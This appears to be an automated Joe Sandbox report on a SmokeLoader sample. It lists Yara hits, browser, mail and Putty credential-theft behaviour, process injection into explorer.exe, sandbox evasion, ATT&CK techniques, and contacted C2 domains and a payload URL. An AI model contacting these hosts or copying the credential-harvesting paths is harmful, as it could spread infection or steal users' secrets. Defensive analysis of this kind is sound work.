      Source: Yara matchFile source: 00000006.00000002.2106441385.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.2264170490.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2045088261.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1799202066.0000000000561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2520072402.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000002.4174299297.0000000000821000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5368, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5292, type: MEMORYSTR
      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
      Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Tries to steal Mail credentials (via file / registry access)
      Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

      Remote Access Functionality

      barindex
      Yara detected SmokeLoader
      Source: Yara matchFile source: 00000007.00000002.2263785204.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2045484809.0000000001FE1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1799134235.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2106729164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2520412148.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2106441385.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.2264170490.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2045088261.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1799202066.0000000000561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2520072402.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000002.4174299297.0000000000821000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5368, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5292, type: MEMORYSTR

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		2
      Disable or Modify Tools      		1
      OS Credential Dumping      		1
      System Time Discovery      		Remote Services11
      Archive Collected Data      		3
      Ingress Tool Transfer      		Exfiltration Over Other Network Medium1
      Data Encrypted for Impact
      CredentialsDomainsDefault Accounts11
      Native API      		Boot or Logon Initialization Scripts422
      Process Injection      		1
      Deobfuscate/Decode Files or Information      		11
      Input Capture      		3
      File and Directory Discovery      		Remote Desktop Protocol1
      Data from Local System      		21
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Exploitation for Client Execution      		Logon Script (Windows)Logon Script (Windows)2
      Obfuscated Files or Information      		1
      Credentials in Registry      		249
      System Information Discovery      		SMB/Windows Admin Shares1
      Email Collection      		4
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts1
      Command and Scripting Interpreter      		Login HookLogin Hook1
      Software Packing      		NTDS881
      Security Software Discovery      		Distributed Component Object Model11
      Input Capture      		115
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets34
      Virtualization/Sandbox Evasion      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      File Deletion      		Cached Domain Credentials4
      Process Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
      Masquerading      		DCSync1
      Application Window Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job34
      Virtualization/Sandbox Evasion      		Proc Filesystem1
      System Network Configuration Discovery      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt422
      Process Injection      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
      Hidden Files and Directories      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528498 Sample: bCnarg2O62.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 53 nwgrus.ru 2->53 55 ninjahallnews.com 2->55 57 2 other IPs or domains 2->57 71 Suricata IDS alerts for network traffic 2->71 73 Found malware configuration 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 6 other signatures 2->77 10 bCnarg2O62.exe 2->10         started        13 derhswe 2->13         started        15 jfrhswe 2->15         started        17 2 other processes 2->17 signatures3 process4 signatures5 117 Detected unpacking (changes PE section rights) 10->117 119 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->119 121 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 10->121 123 Switches to a custom stack to bypass stack traces 10->123 19 explorer.exe 58 9 10->19 injected 125 Antivirus detection for dropped file 13->125 127 Multi AV Scanner detection for dropped file 13->127 129 Machine Learning detection for dropped file 13->129 131 Maps a DLL or memory area into another process 15->131 133 Checks if the current machine is a virtual machine (disk enumeration) 15->133 135 Creates a thread in another existing process (thread injection) 15->135 process6 dnsIp7 59 ninjahallnews.com 23.145.40.168, 443, 49882, 49890 SURFAIRWIRELESS-IN-01US Reserved 19->59 61 211.171.233.129, 50064, 50066, 50068 LGDACOMLGDACOMCorporationKR Korea Republic of 19->61 63 2 other IPs or domains 19->63 45 C:\Users\user\AppData\Roaming\jfrhswe, PE32 19->45 dropped 47 C:\Users\user\AppData\Roaming\derhswe, PE32 19->47 dropped 49 C:\Users\user\AppData\Local\Temp\9245.exe, PE32+ 19->49 dropped 51 2 other malicious files 19->51 dropped 85 Benign windows process drops PE files 19->85 87 Injects code into the Windows Explorer (explorer.exe) 19->87 89 Deletes itself after installation 19->89 91 2 other signatures 19->91 24 9245.exe 2 19->24         started        27 1D0F.exe 19->27         started        29 explorer.exe 18 19->29         started        31 5 other processes 19->31 file8 signatures9 process10 signatures11 93 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 24->93 95 Machine Learning detection for dropped file 24->95 97 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 24->97 99 Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes) 24->99 33 cmd.exe 1 24->33         started        101 Antivirus detection for dropped file 27->101 103 Detected unpacking (changes PE section rights) 27->103 105 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 27->105 115 5 other signatures 27->115 107 Found evasive API chain (may stop execution after checking mutex) 29->107 109 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 29->109 111 Tries to steal Mail credentials (via file / registry access) 29->111 113 Tries to harvest and steal browser information (history, passwords, etc) 31->113 process12 signatures13 65 Uses netsh to modify the Windows network and firewall settings 33->65 67 Uses ipconfig to lookup or modify the Windows network settings 33->67 69 Modifies the windows firewall 33->69 36 WMIC.exe 33->36         started        39 systeminfo.exe 33->39         started        41 conhost.exe 33->41         started        43 17 other processes 33->43 process14 signatures15 79 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 36->79 81 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 36->81 83 Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes) 36->83

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      bCnarg2O62.exe39%ReversingLabsWin32.Trojan.Smokeloader
      bCnarg2O62.exe100%AviraHEUR/AGEN.1310247
      bCnarg2O62.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\derhswe100%AviraHEUR/AGEN.1310247
      C:\Users\user\AppData\Local\Temp\1D0F.exe100%AviraHEUR/AGEN.1310247
      C:\Users\user\AppData\Roaming\jfrhswe100%AviraHEUR/AGEN.1310247
      C:\Users\user\AppData\Roaming\derhswe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\1D0F.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\jfrhswe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\9245.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\derhswe39%ReversingLabsWin32.Trojan.Smokeloader

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
      https://duckduckgo.com/ac/?q=0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
      https://powerpoint.office.comcember0%URL Reputationsafe
      https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
      https://excel.office.com0%URL Reputationsafe
      http://schemas.micro0%URL Reputationsafe
      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
      https://word.office.com0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://www.ecosia.org/newtab/0%URL Reputationsafe
      https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
      https://android.notify.windows.com/iOS0%URL Reputationsafe
      https://api.msn.com/0%URL Reputationsafe
      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      s-part-0017.t-0009.t-msedge.net
      		13.107.246.45
      		truefalse
        		unknown
        ninjahallnews.com
        		23.145.40.168
        		truetrue
          		unknown
          nwgrus.ru
          		109.175.29.39
          		truetrue
            		unknown
            fp2e7a.wpc.phicdn.net
            		192.229.221.95
            		truefalse
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://23.145.40.164/ksa9104.exefalse
                		unknown
                https://ninjahallnews.com/search.phptrue
                  		unknown
                  https://fallhandbat.com/search.phptrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1777426774.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                      		unknown
                      https://duckduckgo.com/chrome_newtabexplorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://duckduckgo.com/ac/?q=explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://ninjahallnews.com/earch.phpexplorer.exe, 0000000C.00000002.2734650053.00000000033D0000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                          		unknown
                          https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1783714743.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1779684746.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://ninjahallnews.com/search.phpMozilla/5.0explorer.exe, 0000000C.00000002.2734650053.00000000033D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2671360392.0000000000828000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4175889505.0000000002E77000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4175623064.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4175797278.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.4174637350.0000000000F18000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                              		unknown
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://excel.office.comexplorer.exe, 00000001.00000000.1783714743.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.microexplorer.exe, 00000001.00000000.1778417663.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1780694925.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1778954174.0000000008720000.00000002.00000001.00040000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://ninjahallnews.com:443/search.phpgeexplorer.exe, 0000000C.00000002.2734650053.00000000033D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchexplorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://api.msn.com/qexplorer.exe, 00000001.00000000.1779684746.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000001.00000000.1783714743.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000001.00000000.1783714743.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1783714743.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://word.office.comexplorer.exe, 00000001.00000000.1783714743.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoexplorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.drfalse
                                                              		unknown
                                                              https://ninjahallnews.com/explorer.exe, 0000000C.00000002.2734650053.00000000033D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2734650053.0000000003446000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2734650053.000000000345A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                		unknown
                                                                https://ninjahallnews.com/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 0000000C.00000002.2734650053.0000000003446000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://www.ecosia.org/newtab/explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://aka.ms/Vh5j3kexplorer.exe, 00000001.00000000.1777426774.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://ac.ecosia.org/autocomplete?q=explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000001.00000000.1779684746.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://android.notify.windows.com/iOSexplorer.exe, 00000001.00000000.1783714743.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://api.msn.com/explorer.exe, 00000001.00000000.1779684746.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://outlook.com_explorer.exe, 00000001.00000000.1783714743.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.drfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://www.msn.com:443/en-us/feedexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		unknown

                                                                                                      World Map of Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public IPs

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      23.145.40.168
                                                                                                      		ninjahallnews.comReserved
                                                                                                      		22631SURFAIRWIRELESS-IN-01UStrue
                                                                                                      211.171.233.129
                                                                                                      		unknownKorea Republic of
                                                                                                      		3786LGDACOMLGDACOMCorporationKRtrue
                                                                                                      109.175.29.39
                                                                                                      		nwgrus.ruBosnia and Herzegowina
                                                                                                      		9146BIHNETBIHNETAutonomusSystemBAtrue
                                                                                                      23.145.40.164
                                                                                                      		unknownReserved
                                                                                                      		22631SURFAIRWIRELESS-IN-01USfalse

                                                                                                      General Information

                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1528498
                                                                                                      Start date and time:2024-10-08 00:18:33 +02:00
                                                                                                      Joe Sandbox product:CloudBasic
